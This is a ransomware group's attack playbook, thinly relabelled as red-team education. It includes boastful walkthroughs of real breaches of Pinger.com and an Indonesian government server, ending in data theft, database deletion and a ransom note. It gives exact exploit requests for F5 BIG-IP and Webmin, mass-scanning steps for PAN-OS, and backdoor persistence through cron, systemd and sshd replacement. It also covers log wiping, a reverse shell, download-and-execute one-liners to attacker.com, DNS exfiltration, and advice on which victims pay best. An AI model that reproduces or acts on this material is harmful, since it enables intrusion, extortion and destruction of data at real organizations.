This guide is a modified version of an original playbook exclusively used by the HELLCAT Ransomware Group. The original material was written from an offensive, threat actor perspective, detailing real-world attack methodologies.
This version has been restructured for ethical red team education, with all techniques presented strictly for security research purposes. It covers the full attack lifecycle: reconnaissance, exploitation, C2 infrastructure, lateral movement, persistence, evasion techniques, and includes real-world case studies (including walkthroughs of the Pinger.com and Indonesian government breaches).
Important: All content is provided for educational use only. Unauthorized penetration testing is illegal.
- Resources
- Walkthroughs (Including the Pinger.com Breach)
- Case Study: Indonesian Government Ransomware Attack
- C2 Infrastructure Setup
- Persistence Techniques
- Targeted Attack Methodologies
- Network Pivoting Fundamentals
- Operational Security: Reducing Footprint
- Command Cheat Sheet
- MITRE CVE Database
- National Vulnerability Database (NVD)
- Exploit Database (Exploit-DB)
- Search LinkedIn for 'rce cve'
- Follow sites like:
- BleepingComputer
- ThreatPost
- The Hacker News
- Newsletters:
- Cybersecurity Insiders
- DarkReading
- Monitor advisories from:
- Microsoft
- Cisco
- Adobe
- Other major vendors
- YouTube ("CVE")
- Google ("rce cve")
- en.fofa.info (3000 free credits per new account - use new Tor circuit and a disposible email)
- leakix.net
- shodan.io
- censys.io
- github.com
- sploitus.com
- 0day.today
- GitHub repositories (search "PoC CVE-xxxx-xxxx")
- Exploit-DB (use advanced search)
- Packet Storm Security
- Authenticity: Verify through trusted platforms/community feedback
- Replicability: Test in controlled, isolated environment
- Complexity: Analyze prerequisites (privileges/configurations)
- Metasploit Framework (exploit testing)
- Python/scripting knowledge (for PoC modification)
Note: I'll give you all the tools I used in these walkthroughs. If you can't find something, message me and I'll help you out.
Let me walk you through exactly how we got into Pinger.com step-by-step. Here's what we accomplished:
- Triggered building security alarms
- Printed ransom notes on their printers
- Shut down power to their server room
- Stole their source code
- Encrypted their data
-
Finding the Exploit
- I was looking for exploits being used in real attacks and found CVE-2022-1388
- Searched for it on sploitus.com and found a Proof of Concept (PoC)
- Remember: Not all PoCs are complete exploits!
- Followed the source link to GitHub:
https://github.com/alt3kx/CVE-2022-1388_PoC
-
Testing the Exploit
- Now we have two options:
- Test it safely on a local VM first (recommended)
- Go straight to finding vulnerable hosts (riskier)
- Now we have two options:
-
Finding Vulnerable Targets
- This vendor (F5 Big-IP) has special filters:
- Censys.io has them but version detection is hard
- leakix.net works much better for this case
- Try different search engines to see what works best:
- fofa
- shodan
- leakix
- censys
- Good leakix search query:
https://leakix.net/search?scope=leak&q=%2Bplugin%3A%22BigIPVersion%22
(This shows all vulnerable F5 Big-IP hosts)
- This vendor (F5 Big-IP) has special filters:
-
Executing the Exploit
- The PoC uses a POST request - perfect for BurpSuite
- Here's the exact request we used:
POST /mgmt/tm/util/bash HTTP/1.1 Host: 207.140.30.115 Authorization: Basic YWRtaW46 Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: 0 Content-Length: 100 {"command": "run", "utilCmdArgs": " -c 'id' "}
- Here's how we did it:
- Opened BurpSuite
- Sent a normal GET request to the Repeater
- Changed it to the POST request above
- Hit send
-
Confirming We Got In
- The server responded with:
{ "kind": "tm:util:bash:runstate", "command": "run", "utilCmdArgs": " -c 'id' ", "commandResult": "uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0\n" } - Boom! We have root access (RCE).
- The server responded with:
-
What We Did After Getting In
- Set up SSH port forwarding (port 8081)
- Compromised multiple Jenkins servers
- Accessed terabytes of data including:
- Plain text chat logs
- Usernames and passwords
- System logs
- Complete source code
- Fun fact: Pinger owns TextFree - the biggest free phone number app in North America!
For this walkthrough, we'll use a fresh N-day vulnerability:
CVE-2024-0012
PAN-OS Authentication Bypass → Remote Code Execution
Step 1: Locate the Exploit
- Searched sploitus.com for the CVE
- Found working PoC at:
github.com/TalatumLabs/CVE-2024-0012_CVE-2024-9474_PoC
Step 2: Find Vulnerable Targets
- Create account on en.fofa.info
- Search
"PanOS" - Filter results by:
- Title = "Login" (shows exposed firewalls/VPNS)
- Country/port filters (optional)
- Export results
Step 3: Format Target List Convert results to this format (use AI or scripting):
https://1.1.1.1:4443/
https://2.2.2.2:443/
https://3.3.3.3:4443/
https://4.4.4.4:443/
Save as ips.txt
Step 4: Mass Vulnerability Check Run the checker:
python3 checker.py ips.txt --no-verify >> out.txt 2>&1Monitor progress in second terminal:
tail -f out.txtAfter completion, extract vulnerable hosts:
cat out.txt | grep 'is vuln'Step 5: Exploitation Execute the PoC against vulnerable targets:
python3 poc.py target_urlResult: Reverse shell obtained
Target: bppkad.blorakab.go.id
- CVE-2019-15107 in Webmin
- Custom Python checker available (DM for script)
- Webmin 1.890 contained backdoor allowing root command execution
- Versions 1.900-1.920 required:
- Enabled password change feature at:
Webmin -> Webmin Configuration -> Authentication
- Enabled password change feature at:
POST /password_change.cgi HTTP/1.1
Host: 10.11.1.88:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: http://10.11.1.88:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
expired=id1. Backdoor Installation
- Added Perl backdoor to
/var/www/htmlfor persistent access - Verified via listener before proceeding
2. Target Recon
- Disk usage analysis:
145G / 111G /home 110G /home/backup-db/efinance 110G /home/backup-db 51G /home/backup-db/efinance/2021 34G /home/backup-db/efinance/2019 29G /var 27G /var/databases/firebird 27G /var/databases 24G /home/backup-db/efinance/2020 - Key discoveries:
- Primary database server
- Backups stored on production systems
- Firebird DBMS in use
3. Data Exfiltration
- Cracked Firebird default credentials
- Mounted attacker NAS
- Exfiltrated via
rsync
4. Ransom Deployment
- Executed
rm -rfon production databases - Left ransom note:
└─# ssh -i ./indgov root@180.214.248.20 -p 2222 Linux bppkad-dbserver 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64 IMPORTANT!!! IMPORTANT!!! IMPORTANT!!! IMPORTANT!!! IMPORTANT!!! Your files have been ENCRYPTED AND STOLEN by the HELLCAT Ransomware Group. View the note to see how to get your data. 'HOW TO GET YOUR DATA.txt' in every main directory.
- Immediate effect: Site showed database connection errors
- 14+ days downtime
- Data successfully monetized
1. Server Requirements
- Recommended: VPS (I use 4vps.su)
2. Installation
curl https://sliver.sh/install | sudo bashThen start Sliver:
sliver3. Basic Configuration
- Client connects to local server by default
- Create new operators:
sliver > new-operator - For external servers: Edit configuration file
Windows payload:
sliver > generate --mtls 192.168.1.10 --os windowsLinux payload:
sliver > generate --mtls 192.168.1.10 --os linuxMTLS listener:
sliver > listener mtls --host 192.168.1.10HTTPS listener:
sliver > listener https --host 192.168.1.10- Domain Fronting: Use compromised legitimate domains
- Encryption: Always use HTTPS/mTLS
- Rotation: Regularly change infrastructure
| Feature | Beacons | Implants |
|---|---|---|
| Activity | Low-noise, asynchronous | Constant connection |
| Detection Risk | Low | Higher |
| Flexibility | Modular, dynamic commands | Predefined functionality |
| Use Case | Stealthy operations | Immediate interaction |
Key Differences:
-
Beacons:
- Lightweight callbacks
- On-demand tasking
- Better for evasion
-
Implants:
- Persistent connection
- Faster response
- Easier to detect
The most effective persistence techniques include:
- Trusted binary hijacking
- Custom service creation
- Crontab entries (temporary only)
Note: Crontab should only be used for quick temporary access. It's easily detected via crontab -l.
# Add persistence
(crontab -l 2>/dev/null; echo "@reboot /path/to/backdoor") | crontab -
# Verify
crontab -lCreate service file:
echo "[Unit]
Description=System Update Service
[Service]
ExecStart=/bin/bash /path/to/backdoor.sh
Restart=always
[Install]
WantedBy=multi-user.target" > /etc/systemd/system/sysupdate.serviceEnable and start:
systemctl enable sysupdate
systemctl start sysupdate
systemctl status sysupdate # Verify# Identify target binary
which sshd
# Replace binary
mv /usr/sbin/sshd /usr/sbin/sshd.bak
cp /path/to/backdoor /usr/sbin/sshd
chmod +x /usr/sbin/sshd
# Restart service
systemctl restart sshd
# Add to rc.local for backup
echo "/usr/sbin/sshd" >> /etc/rc.local-
Payload Obfuscation:
- Encrypt/hash your payloads
- Use living-off-the-land binaries (LOLBins)
-
Communication Security:
- Always use encrypted channels (SSL/TLS)
- Implement certificate pinning
-
Behavioral Blending:
- Randomize callbacks times
- Mimic normal user/process patterns
- Limit CPU/memory usage
Pro Tip: Combine multiple methods for resilient persistence while maintaining operational security.
-
Reconnaissance First
Dedicate substantial time to mapping the attack surface -
Multi-Vector Approach
Combine:- Social engineering
- Exploits
- Physical breaches
-
Continuous Adaptation
Regularly update tools/techniques to bypass defenses -
Deception Tactics
Implement decoy activities to mislead defenders
| Target Type | Focus Area | Monetization Potential |
|---|---|---|
| Financial Systems | Transactional databases | Direct financial gain |
| Healthcare Records | Patient data repositories | High black market value |
| ICS/SCADA Systems | Critical infrastructure | Disruption/ransom |
- Data Encryption: Mask stolen data in transit
- Cloud Storage: Use services like:
- Dropbox
- Google Drive
as transfer intermediaries
# Passive scanning
amass enum -passive -d example.com
# Active scanning (with brute force)
amass enum -active -d example.com
# Save results
amass enum -d example.com -o output.txt
# Network visualization
amass viz -d example.com -o network_graph.gexfExample: Targeting AT&T
- Discover all related domains (att.com, *.att.com)
- Identify exposed services
- Map internal network relationships
- Develop/select exploits for identified vulnerabilities
- Create tailored payloads
- Establish initial access points
- Thoroughness: Comprehensive recon enables precise targeting
- Patience: Quality reconnaissance takes time
- Opportunity Spotting: Look for "open windows" in defenses during mapping
# Establish SOCKS proxy via SSH
ssh -D 8080 user@pivot_host
# If connection fails:
1. Edit /etc/ssh/sshd_config on target
2. Restart SSH service:
systemctl restart sshd-
RDP + SSH Forwarding
- Forward SSH through RDP to VPS
- Configure Firefox to use SOCKS5 proxy (localhost:1080)
-
Internal Network Scanning
- Discover hosts via pivoted connection
- Service enumeration:
nmap -sT -p 80,443 --proxy socks5://localhost:1080 192.168.1.100
- Banner grabbing for service identification
BloodHound Setup:
- Install on attack machine
- Collect data via SharpHound on Windows or Linux equivalent
- Analyze attack paths and privilege escalation opportunities
# Set up listener
sliver > listener mtls --host 192.168.1.10
# Generate pivot payload
sliver > generate --mtls 192.168.1.10 --os windows --arch x64 --pivot
# Establish proxy tunnel
sliver > socks startBrowser Configuration (Firefox):
- Preferences → Network Settings → Manual Proxy
- SOCKS Host:
localhost - Port:
1080 - Version: SOCKS5
-
Multi-Host Pivoting
# Scan additional segments nmap -Pn 192.168.1.0/24 -
Payload Chaining
- Generate internal payloads via existing pivot
- Stage attacks through multiple jump hosts
-
Segmented Network Access
- Chain proxies through multiple compromised hosts
- Route traffic through nested segments
- Rotate pivot points regularly
- Use encrypted tunnels (SSH/SOCKS5)
- Limit scan intensity to avoid detection
- Clear logs on pivot hosts
Common LOLBins:
| Windows | Linux |
|---|---|
certutil |
wget |
mshta |
curl |
bitsadmin |
bash |
powershell |
perl |
regsvr32 |
python |
PowerShell Example:
powershell -ep bypass -Command "Invoke-WebRequest -Uri 'http://attacker.com/payload' -OutFile 'C:\Windows\Temp\payload.exe'; Start-Process 'C:\Windows\Temp\payload.exe'"Linux:
# Disable history temporarily
unset HISTFILE
# Disable for current session
export HISTSIZE=0
# Clear existing history
history -c
# Clear log files
echo "" > /var/log/auth.log
echo "" > /var/log/syslogWindows:
# Disable PowerShell history
$MaximumHistoryCount = 0
# Clear PowerShell history
Remove-Item -Path (Get-PSReadlineOption).HistorySavePath
# Clear event logs
wevtutil cl System
Clear-EventLog -LogName "Windows PowerShell"- Use frameworks:
- Cobalt Strike
- Meterpreter
- Sliver
- Execute payloads entirely in memory
- Avoid disk writes
-
DNS Tunneling
- Encode data in DNS queries
- Bypass HTTP monitoring
-
Cloud Storage
- Use encrypted transfers to:
- Dropbox
- Google Drive
- AWS S3
- Use encrypted transfers to:
-
Data Segmentation
- Split large files into chunks
- Exfiltrate at random intervals
- Use varying protocols
# Route through encrypted channels
proxychains nmap -sT 192.168.1.100
ssh -D 8080 user@jump_host
# Domain fronting techniques
curl --resolve legitdomain.com:443:1.2.3.4 https://legitdomain.com/api- Rotate C2 infrastructure daily
- Randomize callback intervals (30-120 mins)
- Use common user-agents
- Limit network bandwidth usage
- Spoof MAC addresses when possible
# Crontab one-liner
(crontab -l 2>/dev/null; echo "@reboot /path/to/payload") | crontab -# Alternative download methods
python -c "import urllib; urllib.urlretrieve('http://url/to/file', 'outfile')"
# Background file transfer with logging
nohup rsync -av --log-file=./rsync.log /source /destination &
# SSH file transfer
scp user@host:/remote/file /local/destination# Upgrade to interactive shell
python -c 'import pty; pty.spawn("/bin/bash")'
# Linux reverse shell
bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1# Host discovery
nmap -Pn TARGET_RANGE
# Connection monitoring
netstat -tulnp
# HTTP requests
curl -X POST http://target/path -d 'malicious_payload'
# File downloads
wget http://attacker.com/payload -O /tmp/payload
curl -o /tmp/payload https://attacker.com/payload# Bypass execution policy
powershell -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/script.ps1')"
# Clear event logs
wevtutil cl System# DNS exfiltration (encode data in DNS queries)
dig +short `base64 data`.attacker.com TXT
# Split large files for exfiltration
split -b 1M largefile chunk_Pro Tips:
- Always encrypt sensitive data in transit
- Use
nohuportmuxfor long-running operations - Chain commands with
&&for sequential execution - Test all commands in a lab environment first
Planned Content Expansions:
-
Attack Surface Mapping
[ ]Add detailed subdomain enumeration techniques
[ ]Include cloud asset discovery methods
[ ]Expand network visualization examples -
Evasion Techniques
[ ]Deep dive into process injection
[ ]Add artifactless execution patterns
[ ]Cover traffic morphing strategies -
Sliver Beacons
[ ]Advanced beacon configuration options
[ ]OPSEC considerations for beacons
[ ]Beacon tasking scenarios -
Pivot Walkthrough
[ ]Multi-hop SSH tunneling
[ ]IPv6 pivoting techniques
[ ]Router-specific pivoting -
Domain Fronting
[ ]Cloud provider-specific setups
[ ]Detection avoidance measures
[ ]CDN configuration examples -
DNS Tunneling
[ ]DNScat2 setup guide
[ ]Alternative DNS exfil tools
[ ]Defensive detection methods